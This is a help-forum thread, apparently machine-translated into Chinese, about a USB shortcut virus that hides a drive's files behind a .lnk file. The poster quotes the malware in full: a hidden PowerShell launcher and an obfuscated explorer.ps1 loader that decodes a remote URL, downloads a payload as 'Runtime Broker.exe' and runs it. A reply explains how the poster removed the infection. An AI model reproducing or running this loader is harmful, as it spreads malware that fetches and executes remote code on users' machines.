我写这篇文章是为了解决自 2022 年 2 月以来一直影响我电脑的这个问题。基本上,当我将 USB 笔插入电脑时,就会出现一个 .lnk 文件,在这个文件中我可以找到我的文件。如果我看到 .lnk 属性,则目标是:
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -nologo -NoProfile -ExecutionPolicy ByPass -File explorer.ps1
如果我将 USB 笔插入 Android 手机或平板电脑,它会要求我恢复设备。此外,还有一个名为 explorer.ps1 的文件,如果我用记事本打开它,我会看到以下内容:
$a = $(get-location).Path;$b = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];$c = $env:TEMP;$d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("V2luU29mdCBVcGRhdGUgU2VydmljZVxweXRob253LmV4ZQ=="));$f = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aHR0cHM6Ly9lbGRpOC5naXRodWIuaW8vc3JjLnR4dA=="));$aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("44Wk"));$bb = $a + "\" + $aa + "\";$h = $b + "\" + $d;$mn = $c + "\Runtime Broker.exe";if (Test-Path -Path $bb -PathType Container) {ii $bb;$q = New-Object System.Net.WebClient;while (!(Test-Path $mn)) {try {$q.DownloadFile([System.Net.HttpWebRequest]::Create( -join ( -split (((New-Object System.Net.WebClient).DownloadString($f)) -replace " ", "1" -replace "`t", "0" -replace "\n", " ") | % { [char][convert]::toint32($_, 2) })).GetResponse().ResponseUri.AbsoluteUri, $mn);}catch [System.Net.WebException] {if ($_.Exception.Response.StatusCode) {exit}}catch {}Start-Sleep -s 5;}while (!(Test-Path $h)) {Start-Process -FilePath $mn -Wait;Start-Sleep -s 1;}}*
我使用 norton premium 和 malwarebytes 进行了扫描,但显然没有病毒。我尝试卸载并重新安装 USB 驱动程序,但问题仍然存在。尝试停用 powershell,安装新版本的 powershell,但它不起作用。
(这一切都发生在我将我的 usb 笔插入朋友的 chromebook 之后。当我去复印店时,他的文件在 .lnk 文件下,而我的文件不可用。从那时起,我插入联想的每个 usbpen、sd 卡、设备都会出现这个 .lnk 文件并且无法删除)。
谢谢
答案1
我也遇到了同样的问题。每次我将 USB 闪存盘连接到计算机时,脚本都会自我复制。
我分析了代码,然后我的注意力集中到了运行时代理.exe在分析了任务管理器上运行的进程后,我发现一个与基本进程同时运行的同名进程:运行时代理 (32 位)。
Runtime Broker 是一个小程序,用于管理通过 Microsoft Store 下载的应用程序或程序,可以通过以下路径访问该程序:目录:\Windows\System32。
分析程序名称的路径后,我进入了计算机目录:\Windows尝试运行该程序时出现错误,随后缺少 python 文件,这很奇怪。
我终止了该进程并删除了可执行文件。
当此过程完成后,我消除了问题,并按照任何消除病毒快捷方式的指南恢复了数据,我格式化了闪存驱动器,将其重新插入电脑,一切恢复正常。